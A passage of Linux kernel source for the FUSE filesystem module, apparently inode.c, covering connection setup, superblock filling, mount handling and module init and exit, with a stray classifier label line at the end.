FUSE_SPLICE_MOVE | FUSE_SPLICE_READ | FUSE_FLOCK_LOCKS | FUSE_IOCTL_DIR | FUSE_AUTO_INVAL_DATA | FUSE_DO_READDIRPLUS | FUSE_READDIRPLUS_AUTO | FUSE_ASYNC_DIO | FUSE_WRITEBACK_CACHE | FUSE_NO_OPEN_SUPPORT; req->in.h.opcode = FUSE_INIT; req->in.numargs = 1; req->in.args[0].size = sizeof(*arg); req->in.args[0].value = arg; req->out.numargs = 1; /* Variable length argument used for backward compatibility with interface version < 7.5. Rest of init_out is zeroed by do_get_request(), so a short reply is not a problem */ req->out.argvar = 1; req->out.args[0].size = sizeof(struct fuse_init_out); req->out.args[0].value = &req->misc.init_out; req->end = process_init_reply; fuse_request_send_background(fc, req); } static void fuse_free_conn(struct fuse_conn *fc) { WARN_ON(!list_empty(&fc->devices)); kfree_rcu(fc, rcu); } static int fuse_bdi_init(struct fuse_conn *fc, struct super_block *sb) { int err; fc->bdi.name = "fuse"; fc->bdi.ra_pages = (VM_MAX_READAHEAD * 1024) / PAGE_SIZE; /* fuse does it's own writeback accounting */ fc->bdi.capabilities = BDI_CAP_NO_ACCT_WB | BDI_CAP_STRICTLIMIT; err = bdi_init(&fc->bdi); if (err) return err; fc->bdi_initialized = 1; if (sb->s_bdev) { err = bdi_register(&fc->bdi, NULL, "%u:%u-fuseblk", MAJOR(fc->dev), MINOR(fc->dev)); } else { err = bdi_register_dev(&fc->bdi, fc->dev); } if (err) return err; /* * For a single fuse filesystem use max 1% of dirty + * writeback threshold. * * This gives about 1M of write buffer for memory maps on a * machine with 1G and 10% dirty_ratio, which should be more * than enough. * * Privileged users can raise it by writing to * * /sys/class/bdi/<bdi>/max_ratio */ bdi_set_max_ratio(&fc->bdi, 1); return 0; } struct fuse_dev *fuse_dev_alloc(struct fuse_conn *fc) { struct fuse_dev *fud; fud = kzalloc(sizeof(struct fuse_dev), GFP_KERNEL); if (fud) { fud->fc = fuse_conn_get(fc); fuse_pqueue_init(&fud->pq); spin_lock(&fc->lock); list_add_tail(&fud->entry, &fc->devices); spin_unlock(&fc->lock); } return fud; } EXPORT_SYMBOL_GPL(fuse_dev_alloc); void fuse_dev_free(struct fuse_dev *fud) { struct fuse_conn *fc = fud->fc; if (fc) { spin_lock(&fc->lock); list_del(&fud->entry); spin_unlock(&fc->lock); fuse_conn_put(fc); } kfree(fud); } EXPORT_SYMBOL_GPL(fuse_dev_free); static int fuse_fill_super(struct super_block *sb, void *data, int silent) { struct fuse_dev *fud; struct fuse_conn *fc; struct inode *root; struct fuse_mount_data d; struct file *file; struct dentry *root_dentry; struct fuse_req *init_req; int err; int is_bdev = sb->s_bdev != NULL; err = -EINVAL; if (sb->s_flags & MS_MANDLOCK) goto err; sb->s_flags &= ~(MS_NOSEC | MS_I_VERSION); if (!parse_fuse_opt(data, &d, is_bdev)) goto err; if (is_bdev) { #ifdef CONFIG_BLOCK err = -EINVAL; if (!sb_set_blocksize(sb, d.blksize)) goto err; #endif } else { sb->s_blocksize = PAGE_SIZE; sb->s_blocksize_bits = PAGE_SHIFT; } sb->s_magic = FUSE_SUPER_MAGIC; sb->s_op = &fuse_super_operations; sb->s_maxbytes = MAX_LFS_FILESIZE; sb->s_time_gran = 1; sb->s_export_op = &fuse_export_operations; file = fget(d.fd); err = -EINVAL; if (!file) goto err; if ((file->f_op != &fuse_dev_operations) || (file->f_cred->user_ns != &init_user_ns)) goto err_fput; fc = kmalloc(sizeof(*fc), GFP_KERNEL); err = -ENOMEM; if (!fc) goto err_fput; fuse_conn_init(fc); fc->release = fuse_free_conn; fud = fuse_dev_alloc(fc); if (!fud) goto err_put_conn; fc->dev = sb->s_dev; fc->sb = sb; err = fuse_bdi_init(fc, sb); if (err) goto err_dev_free; sb->s_bdi = &fc->bdi; /* Handle umasking inside the fuse code */ if (sb->s_flags & MS_POSIXACL) fc->dont_mask = 1; sb->s_flags |= MS_POSIXACL; fc->flags = d.flags; fc->user_id = d.user_id; fc->group_id = d.group_id; fc->max_read = max_t(unsigned, 4096, d.max_read); /* Used by get_root_inode() */ sb->s_fs_info = fc; err = -ENOMEM; root = fuse_get_root_inode(sb, d.rootmode); root_dentry = d_make_root(root); if (!root_dentry) goto err_dev_free; /* only now - we want root dentry with NULL ->d_op */ sb->s_d_op = &fuse_dentry_operations; init_req = fuse_request_alloc(0); if (!init_req) goto err_put_root; __set_bit(FR_BACKGROUND, &init_req->flags); if (is_bdev) { fc->destroy_req = fuse_request_alloc(0); if (!fc->destroy_req) goto err_free_init_req; } mutex_lock(&fuse_mutex); err = -EINVAL; if (file->private_data) goto err_unlock; err = fuse_ctl_add_conn(fc); if (err) goto err_unlock; list_add_tail(&fc->entry, &fuse_conn_list); sb->s_root = root_dentry; file->private_data = fud; mutex_unlock(&fuse_mutex); /* * atomic_dec_and_test() in fput() provides the necessary * memory barrier for file->private_data to be visible on all * CPUs after this */ fput(file); fuse_send_init(fc, init_req); return 0; err_unlock: mutex_unlock(&fuse_mutex); err_free_init_req: fuse_request_free(init_req); err_put_root: dput(root_dentry); err_dev_free: fuse_dev_free(fud); err_put_conn: fuse_bdi_destroy(fc); fuse_conn_put(fc); err_fput: fput(file); err: return err; } static struct dentry *fuse_mount(struct file_system_type *fs_type, int flags, const char *dev_name, void *raw_data) { return mount_nodev(fs_type, flags, raw_data, fuse_fill_super); } static void fuse_kill_sb_anon(struct super_block *sb) { struct fuse_conn *fc = get_fuse_conn_super(sb); if (fc) { down_write(&fc->killsb); fc->sb = NULL; up_write(&fc->killsb); } kill_anon_super(sb); } static struct file_system_type fuse_fs_type = { .owner = THIS_MODULE, .name = "fuse", .fs_flags = FS_HAS_SUBTYPE, .mount = fuse_mount, .kill_sb = fuse_kill_sb_anon, }; MODULE_ALIAS_FS("fuse"); #ifdef CONFIG_BLOCK static struct dentry *fuse_mount_blk(struct file_system_type *fs_type, int flags, const char *dev_name, void *raw_data) { return mount_bdev(fs_type, flags, dev_name, raw_data, fuse_fill_super); } static void fuse_kill_sb_blk(struct super_block *sb) { struct fuse_conn *fc = get_fuse_conn_super(sb); if (fc) { down_write(&fc->killsb); fc->sb = NULL; up_write(&fc->killsb); } kill_block_super(sb); } static struct file_system_type fuseblk_fs_type = { .owner = THIS_MODULE, .name = "fuseblk", .mount = fuse_mount_blk, .kill_sb = fuse_kill_sb_blk, .fs_flags = FS_REQUIRES_DEV | FS_HAS_SUBTYPE, }; MODULE_ALIAS_FS("fuseblk"); static inline int register_fuseblk(void) { return register_filesystem(&fuseblk_fs_type); } static inline void unregister_fuseblk(void) { unregister_filesystem(&fuseblk_fs_type); } #else static inline int register_fuseblk(void) { return 0; } static inline void unregister_fuseblk(void) { } #endif static void fuse_inode_init_once(void *foo) { struct inode *inode = foo; inode_init_once(inode); } static int __init fuse_fs_init(void) { int err; fuse_inode_cachep = kmem_cache_create("fuse_inode", sizeof(struct fuse_inode), 0, SLAB_HWCACHE_ALIGN|SLAB_ACCOUNT, fuse_inode_init_once); err = -ENOMEM; if (!fuse_inode_cachep) goto out; err = register_fuseblk(); if (err) goto out2; err = register_filesystem(&fuse_fs_type); if (err) goto out3; return 0; out3: unregister_fuseblk(); out2: kmem_cache_destroy(fuse_inode_cachep); out: return err; } static void fuse_fs_cleanup(void) { unregister_filesystem(&fuse_fs_type); unregister_fuseblk(); /* * Make sure all delayed rcu free inodes are flushed before we * destroy cache. */ rcu_barrier(); kmem_cache_destroy(fuse_inode_cachep); } static struct kobject *fuse_kobj; static int fuse_sysfs_init(void) { int err; fuse_kobj = kobject_create_and_add("fuse", fs_kobj); if (!fuse_kobj) { err = -ENOMEM; goto out_err; } err = sysfs_create_mount_point(fuse_kobj, "connections"); if (err) goto out_fuse_unregister; return 0; out_fuse_unregister: kobject_put(fuse_kobj); out_err: return err; } static void fuse_sysfs_cleanup(void) { sysfs_remove_mount_point(fuse_kobj, "connections"); kobject_put(fuse_kobj); } static int __init fuse_init(void) { int res; printk(KERN_INFO "fuse init (API version %i.%i)\n", FUSE_KERNEL_VERSION, FUSE_KERNEL_MINOR_VERSION); INIT_LIST_HEAD(&fuse_conn_list); res = fuse_fs_init(); if (res) goto err; res = fuse_dev_init(); if (res) goto err_fs_cleanup; res = fuse_sysfs_init(); if (res) goto err_dev_cleanup; res = fuse_ctl_init(); if (res) goto err_sysfs_cleanup; sanitize_global_limit(&max_user_bgreq); sanitize_global_limit(&max_user_congthresh); return 0; err_sysfs_cleanup: fuse_sysfs_cleanup(); err_dev_cleanup: fuse_dev_cleanup(); err_fs_cleanup: fuse_fs_cleanup(); err: return res; } static void __exit fuse_exit(void) { printk(KERN_DEBUG "fuse exit\n"); fuse_ctl_cleanup(); fuse_sysfs_cleanup(); fuse_fs_cleanup(); fuse_dev_cleanup(); } module_init(fuse_init); module_exit(fuse_exit);
__label__pos
0.999455